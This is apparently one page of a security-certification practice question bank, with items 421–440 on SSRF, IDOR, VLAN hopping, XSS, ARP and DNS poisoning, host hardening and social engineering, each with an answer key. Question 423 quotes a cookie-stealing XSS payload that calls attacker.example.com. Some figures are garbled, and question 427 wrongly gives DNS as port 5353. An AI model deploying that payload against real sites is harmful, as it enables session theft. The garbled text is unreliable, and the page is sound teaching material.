Threats, Vulnerabilities, and Mitigations

490 questions

Question 421Question

A security team conducts an audit on a cloud-native microservices application and identifies two critical software defects in the API gateway:

1. An endpoint accepts user-supplied URL parameters to fetch remote image assets, allowing an attacker to compel the server to send HTTP requests to internal cloud metadata IP addresses (169.254.169.254169.254.169.254).
2. Logged-in users can view and update other customers' private profile records simply by altering an account ID integer in the request parameters.

Which of the following vulnerability classifications and remediation strategies correctly address these security findings? (Select TWO).

Select all that apply

Show answer & explanation

Answer: The issue involving forced internal request generation is Server-Side Request Forgery (SSRF), which should be remediated by implementing strict URL allowlists and blocking access to cloud metadata IP addresses.; The issue involving unauthorized access via modified parameter identifiers is an Insecure Direct Object Reference (IDOR), which should be remediated by enforcing server-side object-level authorization checks.

Answer

The findings represent Server-Side Request Forgery (SSRF), which requires URL allowlisting and blocking metadata IP addresses, and Insecure Direct Object Reference (IDOR), which requires enforcing server-side object-level authorization checks.
The first defect allows an attacker to manipulate server-initiated requests to internal infrastructure (such as cloud instance metadata services), defining Server-Side Request Forgery (SSRF). Effective remediation requires URL allowlisting and restricting access to internal IP ranges. The second defect allows authenticated users to access resources belonging to others by modifying record identifiers, defining Insecure Direct Object Reference (IDOR). Effective remediation requires enforcing object-level authorization checks on the server.

Step-by-Step Solution

1
Analyze finding 1 involving server-initiated HTTP requests to internal metadata IP addresses.
Identify the flaw as Server-Side Request Forgery (SSRF) because the web application acts as a proxy to send requests to untrusted or internal destinations.
SSRF occurs when an attacker manipulates parameters to make the server initiate requests to unintended internal network locations.
2
Analyze finding 2 involving manipulation of account ID integers in request parameters.
Identify the flaw as Insecure Direct Object Reference (IDOR) / Broken Object Level Authorization (BOLA).
IDOR occurs when user input directly references database keys or file paths without server-side validation of object ownership.
3
Evaluate appropriate remediation techniques for both identified vulnerabilities.
SSRF requires restricting target domains/IPs via URL allowlisting and blocking internal endpoints like 169.254.169.254169.254.169.254. IDOR requires server-side access control checks verifying object-level authorization.
Secure application design requires input restriction for outbound requests and context-aware authorization for data access.

Key Concept

Application Vulnerability Identification and Remediation (SSRF and IDOR/BOLA)
Question 422Question

During a threat hunting exercise, a security analyst inspects packet captures from an internal network switch interface. The analyst notes Ethernet frames containing nested 802.1Q encapsulation headers, where the outer VLAN tag matches the native VLAN ID of the trunk interface (VLAN 20) and the inner VLAN tag targets an isolated database subnet (VLAN 100). Which of the following network attacks do these frame characteristics indicate?

Show answer & explanation

Answer: VLAN hopping via double tagging

Answer

VLAN hopping via double tagging
The correct answer is VLAN hopping via double tagging. Double tagging takes advantage of switches stripping the outer 802.1Q tag when traffic belongs to the native VLAN of a trunk link. When stripped, the remaining inner tag is processed by downstream switches as legitimate traffic destined for the specified secondary VLAN, bypassing standard VLAN isolation controls.

Step-by-Step Solution

1
Analyze the packet capture details described in the stem.
Identified two 802.1Q headers inside the Ethernet frames (outer tag = native VLAN 20, inner tag = target VLAN 100).
Observing multiple VLAN headers (nested 802.1Q tags) is the key indicator of a double-tagging attack vector.
2
Evaluate the mechanism of switch processing for native VLAN trunk traffic.
The first switch strips the matching native VLAN outer tag and transmits the frame out the trunk link without adding a new tag, exposing the inner tag.
The second switch inspects the inner tag (VLAN 100) and routes/forwards the frame directly into the isolated target segment.
3
Correlate packet characteristics to the correct attack classification.
The indicator strictly matches VLAN hopping via double tagging.
Double tagging allows unidirectional frame delivery across VLAN boundaries without passing through a router.

Key Concept

VLAN Hopping (802.1Q Double Tagging)
Question 423Question

A security analyst reviews web application request logs following a security alert. The log entry shows the following payload submitted via an unauthenticated user comment field:

`comment=<script>window.location='http://attacker.example.com/steal?c='+document.cookie</script>`

Which of the following vulnerabilities is present in the application, and which remediation control best resolves the root cause?

Show answer & explanation

Answer: Cross-Site Scripting (XSS); implement context-aware output encoding and input sanitization.

Answer

Cross-Site Scripting (XSS); implement context-aware output encoding and input sanitization.
The submitted payload uses HTML `<script>` tags and browser DOM manipulation (`document.cookie`) to execute code on the victim's client device, which characterizes Cross-Site Scripting (XSS). Implementing context-aware output encoding ensures that characters such as `<` and `>` are safely rendered as text rather than executed as HTML/JavaScript code by the web browser.

Step-by-Step Solution

1
Analyze the log payload structure
The string `<script>window.location='http://attacker.example.com/steal?c='+document.cookie</script>` targets client-side browser execution to read session cookies.
Identifying the target environment (browser vs database) isolates the specific vulnerability type.
2
Classify the vulnerability type
Client-side code execution via untrusted input in a web application is Cross-Site Scripting (XSS).
SQL injection alters database logic, whereas XSS executes script code within a victim's browser context.
3
Select the appropriate software remediation control
Context-aware output encoding converts special characters (like `<` and `>`) into safe HTML entities prior to rendering.
Remediating application vulnerabilities requires fixing source code handling rather than blocking network traffic or adding authentication checks.

Key Concept

Cross-Site Scripting (XSS) Identification and Remediation
Question 424Question

During a post-incident review, a security analyst discovers that an attacker who gained initial access through a compromised web application loaded a custom Loadable Kernel Module (LKM) to establish a rootkit and achieve kernel-level persistence on a production Linux server. Which host hardening practice provides the MOST effective mitigation to prevent unauthorized kernel module execution?

Show answer & explanation

Answer: Restricting module insertion after boot by locking kernel module loading via sysctl runtime parameters

Answer

Restricting module insertion after boot by locking kernel module loading via sysctl runtime parameters is the most effective host hardening mitigation.
The correct option correctly identifies kernel parameter hardening as the direct technical mitigation for Loadable Kernel Module (LKM) rootkits. Disabling dynamic module loading via system configuration prevents any user space process—even those operating with root privileges—from inserting unverified code into kernel memory space after the system finishes booting.

Step-by-Step Solution

1
Analyze the threat vector described in the scenario.
The attacker achieved local privilege escalation and persistence by dynamically inserting a Loadable Kernel Module (LKM) into kernel memory after compromising an application.
Understanding the attack surface (local host kernel subsystem) is required to select an appropriate host-level control.
2
Evaluate potential host-hardening controls specifically targeted at kernel space protection.
Disabling runtime module loading (e.g., setting kernel.modules_disabled = 1 after boot) permanently restricts kernel module modifications for the operational lifetime of the host.
Host-hardening strategies must enforce the principle of least privilege at the operating system kernel layer.
3
Differentiate effective host controls from network-based or perimeter controls.
Network firewalls, IPS devices, and deception honeypots operate outside the local kernel and cannot block local in-memory LKM execution.
Host vulnerabilities require host-centric hardening measures rather than perimeter or detective controls.

Key Concept

Host Hardening and OS Kernel Security Controls
Question 425Question

A security analyst is investigating several network and wireless security alerts recorded across an enterprise network. Match each observed technical attack indicator with its corresponding attack classification.

Click a left item, then click its matching right item

Items

High RF noise floor across 2.4 GHz frequencies causing massive frame retransmissions and loss of wireless connectivity
Multiple unsolicited ARP reply packets mapping different gateway IP addresses to a single rogue host MAC address
Unsolicited short-range wireless transmissions containing text messages sent to nearby discoverable mobile devices
A rogue access point broadcasting an identical corporate SSID but operating with a different BSSID and higher transmission power

Matches

Show answer & explanation

Answer

RF Jamming matches high RF noise floor indicators; ARP Poisoning matches unsolicited ARP reply IP-to-MAC mappings; Bluejacking matches unsolicited Bluetooth messages; Evil Twin matches rogue APs broadcasting identical SSIDs with different BSSIDs.
Each technical indicator maps precisely to its corresponding attack vector based on network protocol behaviors and radio frequency characteristics.

Step-by-Step Solution

1
Analyze physical wireless spectrum indicators.
Identify that elevated noise floors causing frame retransmissions and signal degradation correspond to RF Jamming.
Jamming directly injects RF noise onto wireless frequencies to disrupt communication channels.
2
Analyze Ethernet layer address resolution protocol traffic.
Identify that unsolicited ARP responses redirecting IP mappings to a target MAC correspond to ARP Poisoning.
An attacker sends gratuitous ARP replies to poison neighbor cache entries for man-in-the-middle positioning.
3
Analyze short-range mobile wireless message alerts.
Identify that sending unsolicited messages over Bluetooth without unauthorized data exfiltration corresponds to Bluejacking.
Bluejacking exploits Bluetooth OBEX push protocols to deliver unwanted messages to discoverable devices.
4
Analyze wireless access point parameters.
Identify that a rogue access point mimicking a legitimate SSID with an altered BSSID corresponds to an Evil Twin attack.
Evil Twin setups clone legitimate wireless network profiles to lure users into connecting and revealing credentials.

Key Concept

Network and Wireless Attack Indicators
Question 426Question

A security team is updating enterprise host hardening standards to prevent unauthorized software execution and mitigate memory corruption exploits on administrative workstations. Which TWO host hardening controls should the security team implement to achieve these objectives?

Select all that apply

Show answer & explanation

Answer: Enforce application control policies to restrict binary execution to approved paths and verified cryptographic signatures; Enable hardware-enforced Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR)

Answer

The security team should enforce application control policies and enable Data Execution Prevention (DEP) along with Address Space Layout Randomization (ASLR).
Application control policies enforce allowlists that prevent unapproved or malicious software binaries from running on the host. Simultaneously, operating system memory protections such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) prevent malicious code execution in protected memory areas and obscure memory target addresses, mitigating memory corruption exploits.

Step-by-Step Solution

1
Identify the primary threat vectors presented in the scenario
The target threats are unauthorized binary execution and memory corruption exploits on host endpoints.
Hardening measures must directly align with the specific attack vectors identified.
2
Select the host mitigation technique for unauthorized software execution
Application control (allowlisting) ensures that only cryptographically signed or explicitly approved applications can launch.
This directly prevents untrusted scripts or malicious binaries from running.
3
Select the host mitigation technique for memory corruption vulnerabilities
Enabling DEP and ASLR prevents malicious shellcode execution in non-executable memory segments and complicates exploit payloads by obfuscating memory addresses.
These memory protection features harden operating system execution memory against buffer overflow attacks.

Key Concept

Host Hardening and Exploit Mitigations
Question 427Question

A network security administrator investigates SIEM alerts after several workstation users report reaching an untrusted website when typing the domain name of an internal portal. Inspection of logs from the primary recursive DNS resolver reveals thousands of unsolicited UDP port 5353 response packets arriving within a fraction of a second. These responses contain forged IP address mappings for the internal portal domain and attempt to match outgoing query transaction IDs (TXIDsTXIDs) before the legitimate authoritative server replies. Which of the following network attacks is indicated by these log entries?

Show answer & explanation

Answer: DNS cache poisoning

Answer

DNS cache poisoning
The correct answer is DNS cache poisoning. This attack occurs when an adversary sends a burst of spoofed DNS responses with randomized transaction IDs (TXIDs) to a recursive DNS resolver. If a forged response matches the TXID of an active outbound request before the legitimate authoritative server responds, the resolver caches the false IP address mapping and directs users to a malicious site.

Step-by-Step Solution

1
Analyze the observed log indicators and traffic behavior.
The logs demonstrate a high volume of unsolicited UDP port 53 responses targeting a recursive resolver to match query transaction IDs (TXIDs) and alter domain IP resolutions.
Attackers perform brute-force transaction ID matching to inject malicious DNS resource records into a resolver's cache before the legitimate authoritative DNS server responds.
2
Correlate the technical indicators with specific network attack definitions.
Corrupting domain-name-to-IP-address resolution entries stored in a caching DNS server is the defining characteristic of DNS cache poisoning.
This redirection allows attackers to divert user traffic from legitimate domain destinations to malicious IP addresses without modifying client system host files.

Key Concept

DNS Cache Poisoning Indicators
Question 428Question

A network security administrator is investigating reports of intermittent network interception on a local subnet. Upon inspecting the ARP table of a target workstation, the administrator records the following entry state:

IP AddressMAC AddressBinding Type
192.168.1.100-11-22-AA-BB-CCDynamic
192.168.1.10500-11-22-AA-BB-CCDynamic

Where 192.168.1.1 is the default gateway and 192.168.1.105 belongs to an unauthorized host on the network. Which of the following attack types is indicated by these findings?

Show answer & explanation

Answer: ARP Poisoning

Answer

ARP Poisoning
ARP poisoning is characterized by spoofed ARP responses that bind an attacker's MAC address to the IP address of a legitimate host or gateway on the local network. The ARP cache output clearly demonstrates two distinct IP addresses bound to the exact same physical MAC address (00-11-22-AA-BB-CC), indicating traffic redirection to the attacker's system.

Step-by-Step Solution

1
Analyze the observed network indicator table
The gateway IP (192.168.1.1) and host IP (192.168.1.105) both map to the identical MAC address 00-11-22-AA-BB-CC.
In standard IPv4 Ethernet networks, each IP address on a local segment must map to a unique physical network interface MAC address.
2
Identify the underlying mechanism and protocol vulnerability
Unsolicited ARP responses (Gratuitous ARP) allow an attacker host to overwrite legitimate entries in local ARP caches.
Address Resolution Protocol (ARP) lacks intrinsic authentication mechanisms, making local devices trust incoming ARP responses.
3
Select the matching attack classification
Mapping an attacker's hardware address to a gateway IP address is the core indicator of ARP poisoning.
This setup allows the unauthorized host to execute an On-Path (Man-in-the-Middle) attack by intercepting subnet traffic destined for the gateway.

Key Concept

ARP Poisoning Indicators
Question 429Question

A manufacturing company relies on legacy operational technology (OT) workstations to manage assembly line machinery. Because these systems run specialized software on an outdated operating system that cannot receive vendor security updates, the security team must harden the workstations without disrupting continuous operations. The primary requirement is to block unauthorized executable files and unapproved dynamic-link libraries (DLLs) from running on the systems. Which of the following host hardening strategies is MOST effective for this requirement?

Show answer & explanation

Answer: Implementation of application allowlisting policies

Answer

Implementation of application allowlisting policies is the most effective host hardening strategy.
Application allowlisting (also known as application whitelisting) enforces an explicit default-deny rule on host OS processes. Only pre-approved binaries, scripts, and libraries (DLLs) specified by hash, path, or digital signature are permitted to execute. This makes it ideal for static legacy operational technology environments where OS patching is impossible.

Step-by-Step Solution

1
Analyze the scenario constraints and requirements.
The target legacy OT systems cannot be patched, run fixed single-purpose software, and require strict prevention of unauthorized binary execution.
Hardening unpatchable legacy hosts requires restrictive execution controls rather than relying on patch management or perimeter filters.
2
Evaluate candidate host-hardening controls against binary execution restriction.
Application allowlisting enforces a strict default-deny policy for any executable, script, or library file not explicitly approved by file path, publisher certificate, or cryptographic hash.
Default-deny application control is optimal for static-function systems like HMIs and OT controllers.
3
Compare against network-level and detective controls.
Firewalls, honeypots, and vulnerability scanners fail to stop localized file execution on the endpoint.
Endpoint security controls are necessary to enforce execution protection on host systems.

Key Concept

Host Application Hardening and Allowlisting
Question 430Question

During a financial audit of a modern web application, security engineers discover that concurrent asynchronous POST requests to the payment endpoint allow users to apply a single-use promotional credit code multiple times simultaneously before the database updates the credit balance to zero. Which of the following application vulnerabilities is being exploited in this scenario?

Show answer & explanation

Answer: Time-of-check to time-of-use (TOCTOU) race condition

Answer

Time-of-check to time-of-use (TOCTOU) race condition
The correct answer correctly identifies the vulnerability as a race condition, specifically a time-of-check to time-of-use (TOCTOU) flaw. When multiple asynchronous requests execute simultaneously, the application checks the credit balance validity for all threads before any single thread finishes updating the balance, allowing duplicate redemptions.

Step-by-Step Solution

1
Analyze the reported application behavior
Multiple asynchronous requests are processed simultaneously to reuse a single-use resource before the database state updates.
Identifying the root cause requires understanding how timing and state changes interact during concurrent processing.
2
Evaluate vulnerability classifications
The flaw occurs because the system validates state at time t1t_1 (check) and modifies state at time t2t_2 (use), creating a window for exploit via concurrent threads.
This timing window between validation and execution is the defining characteristic of a TOCTOU race condition.

Key Concept

Race Conditions and Concurrency Issues (TOCTOU)
Question 431Question

A security analyst reviews alert logs from a Wireless Intrusion Detection System (WIDS) deployed at a corporate headquarters. The WIDS flagged an anomaly where a single access point MAC address is sending immediate 802.11 Probe Response frames to every nearby device broadcasting Probe Requests, automatically matching whatever Service Set Identifier (SSID) the client requests—including 'Airport_Free_WiFi', 'Hotel_Guest', and 'Home_Network'. Which of the following attack types is indicated by this wireless behavior?

Show answer & explanation

Answer: Karma attack

Answer

Karma attack
The correct answer identifies a Karma attack. In a Karma attack, a rogue access point exploits the behavior of wireless devices broadcasting probe requests for SSIDs in their Preferred Network List (PNL). The attacker's AP responds to every probe request claiming to be the exact network the client is seeking, enticing the device to connect automatically.

Step-by-Step Solution

1
Analyze the observed wireless frame behavior in the WIDS log
The rogue device responds to client probe requests by dynamically adopting whichever SSID the requesting device searches for.
Wireless client devices maintain a Preferred Network List (PNL) and broadcast probe requests searching for known networks.
2
Differentiate Karma attacks from general rogue APs or deauthentication attacks
Karma specifically exploits client probe request broadcasts by spoofing responses for any SSID, causing clients to auto-connect to the rogue AP.
This behavior directly defines the signature mechanism of a Karma attack.

Key Concept

Karma Attack Indicators
Question 432Question

During a security review of a custom web reporting service, a security analyst identifies two distinct software vulnerabilities: dynamic user input in the template string parameter is evaluated directly by the rendering engine allowing remote code execution, and un-sanitized file path inputs allow accessing arbitrary system files outside the web root. Which of the following remediation strategies should the development team implement to mitigate these specific vulnerabilities? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Implement strict input validation and path canonicalization to restrict file access strictly within intended directories.; Disable dynamic evaluation within the template renderer and restrict rendering to pre-approved static templates.

Answer

To remediate the identified directory traversal and server-side template injection (SSTI) vulnerabilities, the development team must implement path canonicalization with strict input validation for file access, and disable dynamic evaluation while restricting rendering to pre-approved static templates.
Path canonicalization resolves relative directory references (such as dot-dot-slash sequences) into absolute file paths and checks them against permitted folder boundaries to prevent file traversal. Removing dynamic code execution features from the template engine and restricting rendering to static templates prevents server-side template injection (SSTI) attacks.

Step-by-Step Solution

1
Analyze the file retrieval vulnerability to identify proper software mitigation controls.
Recognize that allowing arbitrary file path references enables directory traversal outside the web root.
Path canonicalization converts path inputs to standard absolute forms and verifies them against an explicit whitelist of allowed directories.
2
Analyze the template rendering flaw to eliminate arbitrary code execution opportunities.
Determine that evaluating user-controlled input inside the template engine leads to Server-Side Template Injection (SSTI).
Disabling dynamic string evaluation and strictly using pre-defined static templates isolates template parsing from untrusted input execution.

Key Concept

Application input validation, path canonicalization, and safe template rendering practices.
Question 433Question

During an enterprise security audit, an incident response team identifies four distinct technical indicators across wireless and wired network segments. Match each observed technical anomaly on the left to its corresponding attack classification on the right.

Click a left item, then click its matching right item

Items

A continuous stream of 802.11 management frames containing reason code 7 sent to client MAC addresses, causing immediate wireless disconnection.
Unsolicited ARP replies broadcasted across a subnet associating the default gateway IP address with an unauthorized host MAC address.
Spurious IPv6 Neighbor Advertisement frames claiming ownership of an existing router link-local address without prior Neighbor Solicitation.
An unauthorized access point broadcasting a corporate SSID with an elevated transmit power (+20 dBm+20\text{ dBm}) to force client reassociation.

Matches

Show answer & explanation

Answer

The technical anomalies match their respective attack categories based on protocol-specific indicators: 802.11 management deauth frames match Deauthentication Attack; unsolicited ARP responses match ARP Poisoning; unauthorized IPv6 Neighbor Advertisements match NDP Spoofing; and rogue APs broadcasting legitimate SSIDs match Evil Twin Attack.
Each technical log indicator aligns directly with its underlying protocol behavior: 802.11 management deauthentication frames force client disconnects (Deauthentication Attack); gratuitous ARP replies corrupt local ARP caches (ARP Poisoning); unsolicited ICMPv6 Neighbor Advertisements corrupt IPv6 neighbor caches (NDP Spoofing); and rogue APs broadcasting identical SSIDs with higher RF signal levels manipulate wireless roaming decisions (Evil Twin Attack).

Step-by-Step Solution

1
Analyze the 802.11 management frame anomaly with reason code 7.
Reason code 7 explicitly denotes explicit wireless disassociation/deauthentication requesting disconnect, matching Deauthentication Attack.
Deauthentication frames are unauthenticated in legacy 802.11 standards and used to force disconnects.
2
Examine the unsolicited ARP response packet capture.
Mapping the gateway IP to an unknown host MAC address manipulates the switch IPv4 neighbor cache, confirming ARP Poisoning.
ARP lacks authentication mechanisms, allowing malicious hosts to spoof mapping responses.
3
Evaluate the IPv6 Neighbor Advertisement anomaly.
NDP Neighbor Advertisements perform address resolution in IPv6 analogous to ARP in IPv4, making unsolicited NA broadcasts indicative of NDP Spoofing.
Without SEND (Secure Neighbor Discovery), NDP messages can be spoofed to divert IPv6 traffic.
4
Identify the rogue AP broadcasting the legitimate corporate SSID.
Mimicking a valid wireless network name with higher power output to trick station roaming algorithms matches the Evil Twin classification.
Wireless clients typically prefer APs with stronger RSSI operating under known SSIDs.

Key Concept

Network and Wireless Attack Indicators
Question 434Question

During a security assessment of a legacy network daemon written in C, security engineers identify that user-supplied input is copied directly into a fixed-size stack buffer using the `strcpy()` function without length checking. A junior developer proposes deploying a Web Application Firewall (WAF) to filter incoming traffic as the primary remediation. Which statement best evaluates the proposed solution and identifies the most effective remediation?

Show answer & explanation

Answer: Deploying a network-level control such as a WAF does not resolve the underlying flaw in the application code; the source code must be modified to implement bounds checking or safe string functions.

Answer

Network-level controls like a WAF do not eliminate software defects; source code modification to enforce bounds checking or safe functions is required.
The correct answer emphasizes that network-level filtering like a WAF is merely a temporary or compensating filter. Complete remediation of a buffer overflow requires securing the application code directly using memory-safe functions or explicit input length checking before copying data to fixed memory buffers.

Step-by-Step Solution

1
Analyze the identified vulnerability
The flaw is an unsafe memory operation in C (`strcpy()`) that creates a stack-based buffer overflow condition.
Understanding the root cause is necessary to select an appropriate mitigation control.
2
Evaluate the proposed mitigation strategy
A WAF operates at the perimeter or application edge and cannot fix memory handling errors inside compiled application binaries.
Perimeter filters may be bypassed and do not correct vulnerable application logic.
3
Determine the proper remediation control
The application code must be remediated directly by replacing `strcpy()` with bounded alternatives like `strncpy()` or using memory-safe safe functions.
Defective software implementation must be resolved at the application source level to ensure effective risk reduction.

Key Concept

Remediating application memory vulnerabilities requires code-level fixes (secure coding standards/bounds checking) rather than sole reliance on external network controls.
Question 435Question

A security analyst reviews packet capture metrics following reports of intermittent traffic manipulation on a corporate wireless network. The packet capture reveals unexpected network protocol behavior during client IP address assignment. Which TWO of the following indicators specifically point to a rogue DHCP server attack on the network? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Multiple DHCP OFFER packets originating from an unauthorized MAC address containing an unapproved default gateway IP; Duplicate DHCP ACK responses observed on the subnet assigning client IP configurations outside the authorized scope pool

Answer

The presence of a rogue DHCP server is confirmed by unauthorized DHCP OFFER packets containing an unapproved default gateway address and duplicate DHCP ACK responses assigning IP configurations outside the legitimate network scope.
A rogue DHCP server operates by broadcasting unauthorized DHCP OFFER and DHCP ACK packets in response to client DHCP DISCOVER requests. These unauthorized packets contain modified IP settings, such as an unapproved default gateway address or DNS server IP, enabling the attacker to perform on-path network interception.

Step-by-Step Solution

1
Analyze the observed network protocol behavior described in the scenario
Identified anomalous IP address assignment traffic during client network initialization.
DHCP attacks target the automated address allocation process on local subnets.
2
Evaluate the specific packet types and attributes characteristic of rogue DHCP servers
Rogue DHCP servers race against legitimate DHCP servers to respond to client DISCOVER messages with unauthorized DHCP OFFER and ACK packets.
By supplying invalid gateway or DNS settings, the attacker establishes an on-path position for interception.
3
Differentiate rogue DHCP indicators from unrelated wireless attacks
Disassociation frame floods represent wireless DoS/deauthentication attacks, while IV reuse represents cryptographic key cracking attempts.
Accurate incident diagnosis requires matching protocol anomalies directly to the underlying threat vector.

Key Concept

Rogue DHCP Server Attack Indicators
Question 436Question

An organization discovers that several employees received fraudulent text messages on their personal mobile devices claiming an urgent security update is required for their corporate email access, directing them to a credential-harvesting site. At the same time, an unauthorized individual attempted to enter the facility by closely following an authorized worker through a secure entrance. Which of the following social engineering vectors are demonstrated in these scenarios? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Smishing; Tailgating

Answer

Smishing and Tailgating are the social engineering vectors demonstrated.
Smishing represents phishing delivered via SMS text messages on mobile devices to steal credentials. Tailgating is a physical social engineering tactic where an unauthorized actor follows an authorized person through a secured barrier without authentication.

Step-by-Step Solution

1
Analyze the mobile communication component
Identify that malicious text messaging (SMS) directing users to a fake site is smishing.
Smishing specifically leverages mobile text messaging channels to deliver phishing lures.
2
Analyze the physical access breach component
Identify that following an authorized employee through a secure doorway without credentials is physical tailgating.
Tailgating relies on social courtesy or distraction to gain unauthenticated entry into restricted physical spaces.

Key Concept

Social Engineering Attack Vectors (Smishing and Tailgating)
Question 437Question

A sales manager receives a phone call from an individual claiming to be an internal IT technician conducting an audit of remote working software. The caller convinces the manager to reveal their account security answers by presenting a fabricated scenario of mandatory system compliance. Which of the following social engineering techniques did the caller perform?

Show answer & explanation

Answer: Pretexting

Answer

The caller performed pretexting by fabricating a believable scenario to manipulate the user into revealing sensitive account security answers.
Pretexting occurs when an attacker invents a scenario (the pretext) to trick a target into releasing confidential data or performing restricted actions. Impersonating an internal technician carrying out an audit is a classic form of pretexting.

Step-by-Step Solution

1
Analyze the scenario details
The attacker established a false identity (IT technician) and constructed a believable story (audit of remote working software) to build trust.
Identifying the primary mechanism of psychological manipulation clarifies the attack type.
2
Evaluate the social engineering definitions
Creating an elaborate fake backstory or pretext to manipulate a target into providing confidential information matches the definition of pretexting.
Matching attacker tactics to standardized taxonomy isolates the correct term.

Key Concept

Pretexting in Social Engineering
Question 438Question

A security analyst is conducting a awareness session regarding telecommunications-based threat vectors. Which of the following social engineering attacks specifically rely on voice phone calls or cellular text messages as their primary delivery vector? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Vishing; Smishing

Answer

The correct options are Vishing and Smishing.
Vishing (voice phishing) and Smishing (SMS phishing) are social engineering attack vectors that specifically utilize telephone calls and cellular text messages, respectively, to impersonate legitimate entities and extract credentials or sensitive information.

Step-by-Step Solution

1
Identify the communication mediums specified in the scenario.
The scenario requires identifying social engineering attack vectors that operate via phone calls (voice) or SMS text messages.
Understanding the delivery medium distinguishes telecommunications social engineering from web-based or physical attack vectors.
2
Evaluate each social engineering attack definition against the targeted communication channels.
Vishing specifically leverages interactive voice calls, while Smishing specifically leverages SMS cellular text messages.
Both terms explicitly denote voice-based and SMS-based phishing techniques.

Key Concept

Telecommunications-based Social Engineering Attack Vectors (Vishing and Smishing)
Question 439Question

An enterprise security analyst investigates an incident where several corporate accounts were compromised. The investigation reveals that employees received text messages on their mobile devices directing them to a fake login site to verify credentials. Additionally, the attacker placed phone calls to affected staff while pretending to be internal IT personnel to convince them to approve multi-factor authentication (MFA) push notifications. Which of the following social engineering attack vectors were directly executed in this campaign? (Select TWO.)

Select all that apply

Show answer & explanation

Answer: Smishing; Vishing

Answer

The threat actor utilized smishing (SMS-based phishing) and vishing (voice-based phishing) during the attack.
The scenario describes two specific delivery mediums: text messages (SMS) used to send malicious links, which defines smishing; and voice phone calls used to manipulate employees into approving MFA push notifications, which defines vishing.

Step-by-Step Solution

1
Analyze the text message delivery mechanism described in the scenario.
Identify that text messages sent to mobile devices directing users to a fake site constitute smishing.
Smishing is social engineering performed specifically over SMS communications.
2
Analyze the voice call delivery mechanism described in the scenario.
Identify that phone calls from an attacker posing as IT personnel constitute vishing.
Vishing involves voice calls (telephone/VoIP) to impersonate trusted entities and deceive victims.

Key Concept

Social Engineering Attack Vectors (Smishing vs. Vishing)
Question 440Question

A customer service representative receives an incoming telephone call from an individual claiming to be an internal network administrator. The caller states that an urgent system maintenance procedure requires the representative to verbally confirm their network login credentials. Which of the following social engineering attack vectors is occurring?

Show answer & explanation

Answer: Vishing

Answer

Vishing
Vishing (voice phishing) specifically describes social engineering attacks conducted via telephone calls or voice communications where the attacker impersonates a trusted entity to extract sensitive information.

Step-by-Step Solution

1
Analyze the communication medium in the scenario
The attack is carried out over an incoming telephone phone call.
Identifying the medium (voice vs text vs email vs physical observation) is key to classifying the attack vector.
2
Evaluate the social engineering vector based on voice communication
Voice-based pretexting and fraud conducted over the telephone is defined as voice phishing (vishing).
The prefix 'vish' stands for voice phishing, matching phone call scenarios.

Key Concept

Vishing (Voice Phishing)
Estimated Time:45s
PreviousPage 22 / 25Next